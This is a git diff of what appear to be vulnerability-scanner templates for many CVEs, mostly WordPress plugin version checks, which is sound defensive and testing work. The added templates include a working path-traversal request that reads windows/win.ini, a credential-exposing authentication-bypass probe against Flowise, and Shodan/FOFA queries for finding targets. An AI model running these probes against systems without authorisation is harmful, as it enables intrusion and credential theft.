poc/cve/CVE-2020-9496.yaml diff --git a/poc/cve/cve-2021-20137(1).yaml b/poc/cve/CVE-2021-20137.yaml similarity index 100% rename from poc/cve/cve-2021-20137(1).yaml rename to poc/cve/CVE-2021-20137.yaml diff --git a/poc/cve/cve-2021-21745.yaml b/poc/cve/CVE-2021-21745.yaml similarity index 100% rename from poc/cve/cve-2021-21745.yaml rename to poc/cve/CVE-2021-21745.yaml diff --git a/poc/cve/cve-2021-22054.yaml b/poc/cve/CVE-2021-22054.yaml similarity index 100% rename from poc/cve/cve-2021-22054.yaml rename to poc/cve/CVE-2021-22054.yaml diff --git a/poc/cve/cve-2021-23241-5623.yaml b/poc/cve/CVE-2021-23241.yaml similarity index 100% rename from poc/cve/cve-2021-23241-5623.yaml rename to poc/cve/CVE-2021-23241.yaml diff --git a/poc/cve/cve-2021-29156-5986.yaml b/poc/cve/CVE-2021-29156.yaml similarity index 100% rename from poc/cve/cve-2021-29156-5986.yaml rename to poc/cve/CVE-2021-29156.yaml diff --git a/poc/cve/cve-2021-30049-6026.yaml b/poc/cve/CVE-2021-30049.yaml similarity index 100% rename from poc/cve/cve-2021-30049-6026.yaml rename to poc/cve/CVE-2021-30049.yaml diff --git a/poc/cve/cve-2021-31805(1).yaml b/poc/cve/CVE-2021-31805.yaml similarity index 100% rename from poc/cve/cve-2021-31805(1).yaml rename to poc/cve/CVE-2021-31805.yaml diff --git a/poc/cve/cve-2021-32172-6125.yaml b/poc/cve/CVE-2021-32172.yaml similarity index 100% rename from poc/cve/cve-2021-32172-6125.yaml rename to poc/cve/CVE-2021-32172.yaml diff --git a/poc/cve/cve-2021-37580-6291.yaml b/poc/cve/CVE-2021-37580.yaml similarity index 100% rename from poc/cve/cve-2021-37580-6291.yaml rename to poc/cve/CVE-2021-37580.yaml diff --git a/poc/cve/cve-2021-39211(1).yaml b/poc/cve/CVE-2021-39211.yaml similarity index 100% rename from poc/cve/cve-2021-39211(1).yaml rename to poc/cve/CVE-2021-39211.yaml diff --git a/poc/cve/cve-2021-40149(1).yaml b/poc/cve/CVE-2021-40149.yaml similarity index 100% rename from poc/cve/cve-2021-40149(1).yaml rename to poc/cve/CVE-2021-40149.yaml diff --git a/poc/cve/cve-2021-40150.yaml b/poc/cve/CVE-2021-40150.yaml similarity index 100% rename from poc/cve/cve-2021-40150.yaml rename to poc/cve/CVE-2021-40150.yaml diff --git a/poc/cve/cve-2021-41349-6434.yaml b/poc/cve/CVE-2021-41349.yaml similarity index 100% rename from poc/cve/cve-2021-41349-6434.yaml rename to poc/cve/CVE-2021-41349.yaml diff --git a/poc/cve/cve-2021-41878-6478.yaml b/poc/cve/CVE-2021-41878.yaml similarity index 100% rename from poc/cve/cve-2021-41878-6478.yaml rename to poc/cve/CVE-2021-41878.yaml diff --git a/poc/cve/cve-2021-41951-6483.yaml b/poc/cve/CVE-2021-41951.yaml similarity index 100% rename from poc/cve/cve-2021-41951-6483.yaml rename to poc/cve/CVE-2021-41951.yaml diff --git a/poc/cve/cve-2021-42551-6510.yaml b/poc/cve/CVE-2021-42551.yaml similarity index 100% rename from poc/cve/cve-2021-42551-6510.yaml rename to poc/cve/CVE-2021-42551.yaml diff --git a/poc/cve/cve-2021-44103(1).yaml b/poc/cve/CVE-2021-44103.yaml similarity index 100% rename from poc/cve/cve-2021-44103(1).yaml rename to poc/cve/CVE-2021-44103.yaml diff --git a/poc/cve/cve-2021-46417(1).yaml b/poc/cve/CVE-2021-46417.yaml similarity index 100% rename from poc/cve/cve-2021-46417(1).yaml rename to poc/cve/CVE-2021-46417.yaml diff --git a/poc/cve/cve-2022-1040.yaml b/poc/cve/CVE-2022-1040.yaml similarity index 100% rename from poc/cve/cve-2022-1040.yaml rename to poc/cve/CVE-2022-1040.yaml diff --git a/poc/cve/cve-2022-21500(1).yaml b/poc/cve/CVE-2022-21500.yaml similarity index 100% rename from poc/cve/cve-2022-21500(1).yaml rename to poc/cve/CVE-2022-21500.yaml diff --git a/poc/cve/cve-2022-24129.yaml b/poc/cve/CVE-2022-24129.yaml similarity index 100% rename from poc/cve/cve-2022-24129.yaml rename to poc/cve/CVE-2022-24129.yaml diff --git a/poc/cve/cve-2022-2487.yaml b/poc/cve/CVE-2022-2487.yaml similarity index 100% rename from poc/cve/cve-2022-2487.yaml rename to poc/cve/CVE-2022-2487.yaml diff --git a/poc/cve/cve-2022-26352.yaml b/poc/cve/CVE-2022-26352.yaml similarity index 100% rename from poc/cve/cve-2022-26352.yaml rename to poc/cve/CVE-2022-26352.yaml diff --git a/poc/cve/cve-2022-28080.yaml b/poc/cve/CVE-2022-28080.yaml similarity index 100% rename from poc/cve/cve-2022-28080.yaml rename to poc/cve/CVE-2022-28080.yaml diff --git a/poc/cve/cve-2022-29014(1).yaml b/poc/cve/CVE-2022-29014.yaml similarity index 100% rename from poc/cve/cve-2022-29014(1).yaml rename to poc/cve/CVE-2022-29014.yaml diff --git a/poc/cve/cve-2022-29464.yaml b/poc/cve/CVE-2022-29464.yaml similarity index 100% rename from poc/cve/cve-2022-29464.yaml rename to poc/cve/CVE-2022-29464.yaml diff --git a/poc/cve/cve-2022-30489.yaml b/poc/cve/CVE-2022-30489.yaml similarity index 100% rename from poc/cve/cve-2022-30489.yaml rename to poc/cve/CVE-2022-30489.yaml diff --git a/poc/cve/cve-2022-31373.yaml b/poc/cve/CVE-2022-31373.yaml similarity index 100% rename from poc/cve/cve-2022-31373.yaml rename to poc/cve/CVE-2022-31373.yaml diff --git a/poc/cve/cve-2022-32015.yaml b/poc/cve/CVE-2022-32015.yaml similarity index 100% rename from poc/cve/cve-2022-32015.yaml rename to poc/cve/CVE-2022-32015.yaml diff --git a/poc/cve/cve-2022-32022(1).yaml b/poc/cve/CVE-2022-32022.yaml similarity index 100% rename from poc/cve/cve-2022-32022(1).yaml rename to poc/cve/CVE-2022-32022.yaml diff --git a/poc/cve/cve-2022-32025.yaml b/poc/cve/CVE-2022-32025.yaml similarity index 100% rename from poc/cve/cve-2022-32025.yaml rename to poc/cve/CVE-2022-32025.yaml diff --git a/poc/cve/cve-2022-32159.yaml b/poc/cve/CVE-2022-32159.yaml similarity index 100% rename from poc/cve/cve-2022-32159.yaml rename to poc/cve/CVE-2022-32159.yaml diff --git a/poc/cve/cve-2022-33174.yaml b/poc/cve/CVE-2022-33174.yaml similarity index 100% rename from poc/cve/cve-2022-33174.yaml rename to poc/cve/CVE-2022-33174.yaml diff --git a/poc/cve/cve-2022-35416(1).yaml b/poc/cve/CVE-2022-35416.yaml similarity index 100% rename from poc/cve/cve-2022-35416(1).yaml rename to poc/cve/CVE-2022-35416.yaml diff --git a/poc/cve/cve-2022-40684.yaml b/poc/cve/CVE-2022-40684.yaml similarity index 100% rename from poc/cve/cve-2022-40684.yaml rename to poc/cve/CVE-2022-40684.yaml diff --git a/poc/cve/CVE-2024-2220.yaml b/poc/cve/CVE-2024-2220.yaml new file mode 100644 index 0000000000..3f081ca94e --- /dev/null +++ b/poc/cve/CVE-2024-2220.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-2220 + +info: + name: > + Button contact VR <= 4.7 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Button contact VR plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/007d8935-974f-4bc4-833e-25ca50a50a29?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-2220 + metadata: + fofa-query: "wp-content/plugins/button-contact-vr/" + google-query: inurl:"/wp-content/plugins/button-contact-vr/" + shodan-query: 'vuln:CVE-2024-2220' + tags: cve,wordpress,wp-plugin,button-contact-vr,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/button-contact-vr/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "button-contact-vr" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 4.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-2662.yaml b/poc/cve/CVE-2024-2662.yaml new file mode 100644 index 0000000000..faa7933034 --- /dev/null +++ b/poc/cve/CVE-2024-2662.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-2662 + +info: + name: > + Unlimited Elements For Elementor (Free Widgets, Addons, Templates) <= 1.5.102 - Authenticated (Admin+) Command Injection + author: topscoder + severity: high + description: > + The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to command injection in all versions up to, and including, 1.5.102. This is due to insufficient filtering of template attributes during the creation of HTML for custom widgets This makes it possible for authenticated attackers, with administrator-level access and above, to execute arbitrary commands on the server. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/58492dbb-b9e0-4477-b85d-ace06dba954c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-2662 + metadata: + fofa-query: "wp-content/plugins/unlimited-elements-for-elementor/" + google-query: inurl:"/wp-content/plugins/unlimited-elements-for-elementor/" + shodan-query: 'vuln:CVE-2024-2662' + tags: cve,wordpress,wp-plugin,unlimited-elements-for-elementor,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/unlimited-elements-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "unlimited-elements-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 1.5.102') \ No newline at end of file diff --git a/poc/cve/CVE-2024-31621.yaml b/poc/cve/CVE-2024-31621.yaml new file mode 100644 index 0000000000..7df09d52bf --- /dev/null +++ b/poc/cve/CVE-2024-31621.yaml @@ -0,0 +1,36 @@ +id: CVE-2024-31621 + +info: + name: Flowise 1.6.5 - Authentication Bypass + author: DhiyaneshDK + severity: high + description: | + The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability. + reference: + - https://www.exploit-db.com/exploits/52001 + - https://github.com/FlowiseAI/Flowise/releases + - https://flowiseai.com/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-2051052918 + tags: cve,cve2024,auth-bypass,flowise + +requests: + - method: GET + path: + - "{{BaseURL}}/API/V1/credentials" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"credentialName":' + - '"updatedDate":' + condition: and + + - type: status + status: + - 200 +# digest: 4a0a004730450220155c2cf39c87f683e27013b8a5c62149ad330e29ba1cceaae4f2cf68c444c7fd022100bee7c37ed60defbdc183d24164dbb70fbb12ba6031a1393aae635c3eb7f3ef8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2024-32399.yaml b/poc/cve/CVE-2024-32399.yaml new file mode 100644 index 0000000000..76689ee791 --- /dev/null +++ b/poc/cve/CVE-2024-32399.yaml @@ -0,0 +1,36 @@ +id: CVE-2024-32399 + +info: + name: RaidenMAILD Mail Server v.4.9.4 - Path Traversal + author: DhiyaneshDK + severity: high + description: | + Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component. + reference: + - https://owasp.org/www-community/attacks/Path_Traversal + - https://github.com/NN0b0dy/CVE-2024-32399/blob/main/README.md + - https://github.com/NN0b0dy/c01/blob/main/01.pdf + - https://github.com/NN0b0dy/CVE-2024-32399 + - https://github.com/nomi-sec/PoC-in-GitHub + classification: + epss-score: 0.00043 + epss-percentile: 0.08167 + metadata: + verified: true + max-request: 1 + shodan-query: html:"RaidenMAILD" + tags: cve,cve2024,lfi,raiden,mail,server + +requests: + - method: GET + path: + - "{{BaseURL}}/webeditor/../../../windows/win.ini" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "[fonts]", "for 16-bit app support")' + - 'contains(header, "application/octet-stream")' + - 'status_code == 200' + condition: and +# digest: 4a0a00473045022100b21edb32b4116b053ec5df064a8c2211cf7a2b9e6293731a8d9f4be377924cef0220379f8f6282665245242f29e33af2608658f85a062be362c3d0ba849564b85059:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2024-3547.yaml b/poc/cve/CVE-2024-3547.yaml new file mode 100644 index 0000000000..0db9a0d7ef --- /dev/null +++ b/poc/cve/CVE-2024-3547.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-3547 + +info: + name: > + Unlimited Elements For Elementor (Free Widgets, Addons, Templates) <= 1.5.102 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'google_connect_error' parameter in all versions up to, and including, 1.5.102 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f629fc93-84ce-4c33-b1c0-3a3194aac477?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-3547 + metadata: + fofa-query: "wp-content/plugins/unlimited-elements-for-elementor/" + google-query: inurl:"/wp-content/plugins/unlimited-elements-for-elementor/" + shodan-query: 'vuln:CVE-2024-3547' + tags: cve,wordpress,wp-plugin,unlimited-elements-for-elementor,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/unlimited-elements-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "unlimited-elements-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 1.5.102') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3828.yaml b/poc/cve/CVE-2024-3828.yaml new file mode 100644 index 0000000000..107f1483c9 --- /dev/null +++ b/poc/cve/CVE-2024-3828.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-3828 + +info: + name: > + Spectra Pro <= 1.1.5 - Authenticated (Author+) Privilege Escalation + author: topscoder + severity: high + description: > + The Spectra Pro plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.1.5. This is due to the plugin allowing lower-privileged users to create registration forms and set the default role to administrator This makes it possible for authenticated attackers, with author-level access and above, to create administrator-level accounts. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e23e7d66-4b57-4feb-bf77-46238bc6ce7c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-3828 + metadata: + fofa-query: "wp-content/plugins/spectra-pro/" + google-query: inurl:"/wp-content/plugins/spectra-pro/" + shodan-query: 'vuln:CVE-2024-3828' + tags: cve,wordpress,wp-plugin,spectra-pro,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/spectra-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "spectra-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 1.1.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3917.yaml b/poc/cve/CVE-2024-3917.yaml new file mode 100644 index 0000000000..72c55d0ebe --- /dev/null +++ b/poc/cve/CVE-2024-3917.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-3917 + +info: + name: > + Pet Manager <= 1.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Pet Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9f397671-0b59-4049-95af-3087e07685f0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-3917 + metadata: + fofa-query: "wp-content/plugins/pet-manager/" + google-query: inurl:"/wp-content/plugins/pet-manager/" + shodan-query: 'vuln:CVE-2024-3917' + tags: cve,wordpress,wp-plugin,pet-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pet-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pet-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 1.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3918.yaml b/poc/cve/CVE-2024-3918.yaml new file mode 100644 index 0000000000..15e1528bfb --- /dev/null +++ b/poc/cve/CVE-2024-3918.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-3918 + +info: + name: > + Pet Manager <= 1.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Pet Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d0c724a4-7783-4d2a-938e-800960c2be64?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-3918 + metadata: + fofa-query: "wp-content/plugins/pet-manager/" + google-query: inurl:"/wp-content/plugins/pet-manager/" + shodan-query: 'vuln:CVE-2024-3918' + tags: cve,wordpress,wp-plugin,pet-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pet-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pet-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 1.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3920.yaml b/poc/cve/CVE-2024-3920.yaml new file mode 100644 index 0000000000..884883b1e3 --- /dev/null +++ b/poc/cve/CVE-2024-3920.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-3920 + +info: + name: > + Flattr <= 1.2.2 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Flattr plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/52f98de0-ad91-4b5a-91ef-6fe705f2bf60?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-3920 + metadata: + fofa-query: "wp-content/plugins/flattr/" + google-query: inurl:"/wp-content/plugins/flattr/" + shodan-query: 'vuln:CVE-2024-3920' + tags: cve,wordpress,wp-plugin,flattr,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/flattr/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "flattr" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 1.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3956.yaml b/poc/cve/CVE-2024-3956.yaml new file mode 100644 index 0000000000..7a13b641ef --- /dev/null +++ b/poc/cve/CVE-2024-3956.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-3956 + +info: + name: > + Pods – Custom Content Types and Fields <= 3.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Pod Form Redirect URL + author: topscoder + severity: medium + description: > + The Pods – Custom Content Types and Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Pod Form widget in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a0707c92-96e9-444a-8a13-52d49c9e3f5c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-3956 + metadata: + fofa-query: "wp-content/plugins/pods/" + google-query: inurl:"/wp-content/plugins/pods/" + shodan-query: 'vuln:CVE-2024-3956' + tags: cve,wordpress,wp-plugin,pods,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pods/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pods" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 3.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4039.yaml b/poc/cve/CVE-2024-4039.yaml new file mode 100644 index 0000000000..b8782324cb --- /dev/null +++ b/poc/cve/CVE-2024-4039.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-4039 + +info: + name: > + Orders Tracking for WooCommerce <= 1.2.10 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: medium + description: > + The The Orders Tracking for WooCommerce plugin for WordPress for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.2.10. This is due to the plugin allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. A partial patch was released in 1.2.10, and a complete patch was released in 1.2.11. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/991ab188-869c-4875-80f3-940000a1717b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-4039 + metadata: + fofa-query: "wp-content/plugins/woo-orders-tracking/" + google-query: inurl:"/wp-content/plugins/woo-orders-tracking/" + shodan-query: 'vuln:CVE-2024-4039' + tags: cve,wordpress,wp-plugin,woo-orders-tracking,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-orders-tracking/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-orders-tracking" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 1.2.10') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4275.yaml b/poc/cve/CVE-2024-4275.yaml new file mode 100644 index 0000000000..80f5cde14f --- /dev/null +++ b/poc/cve/CVE-2024-4275.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-4275 + +info: + name: > + Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders <= 5.9.19 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'Interactive Circles' + author: topscoder + severity: medium + description: > + The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Interactive Circle widget in all versions up to, and including, 5.9.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/91f50b65-f001-4c73-bfe3-1aed3fc10d26?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-4275 + metadata: + fofa-query: "wp-content/plugins/essential-addons-for-elementor-lite/" + google-query: inurl:"/wp-content/plugins/essential-addons-for-elementor-lite/" + shodan-query: 'vuln:CVE-2024-4275' + tags: cve,wordpress,wp-plugin,essential-addons-for-elementor-lite,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "essential-addons-for-elementor-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 5.9.19') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4277.yaml b/poc/cve/CVE-2024-4277.yaml new file mode 100644 index 0000000000..a206334a45 --- /dev/null +++ b/poc/cve/CVE-2024-4277.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-4277 + +info: + name: > + LearnPress – WordPress LMS Plugin <= 4.2.6.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via layout_html Parameter + author: topscoder + severity: medium + description: > + The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘layout_html’ parameter in all versions up to, and including, 4.2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/46693edf-bcc6-4af8-9f26-5ede865f4694?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-4277 + metadata: + fofa-query: "wp-content/plugins/learnpress/" + google-query: inurl:"/wp-content/plugins/learnpress/" + shodan-query: 'vuln:CVE-2024-4277' + tags: cve,wordpress,wp-plugin,learnpress,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learnpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 4.2.6.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4280.yaml b/poc/cve/CVE-2024-4280.yaml new file mode 100644 index 0000000000..bb58bd53cb --- /dev/null +++ b/poc/cve/CVE-2024-4280.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-4280 + +info: + name: > + White Label CMS <= 2.7.3 - Missing Authorization to Plugin Settings Reset + author: topscoder + severity: medium + description: > + The White Label CMS plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the reset_plugin function in all versions up to, and including, 2.7.3. This makes it possible for unauthenticated attackers to reset plugin settings. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/13a206ea-0890-4535-9da7-54a7a45f0452?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-4280 + metadata: + fofa-query: "wp-content/plugins/white-label-cms/" + google-query: inurl:"/wp-content/plugins/white-label-cms/" + shodan-query: 'vuln:CVE-2024-4280' + tags: cve,wordpress,wp-plugin,white-label-cms,medium + +http: + - method: GET + redirects: true + 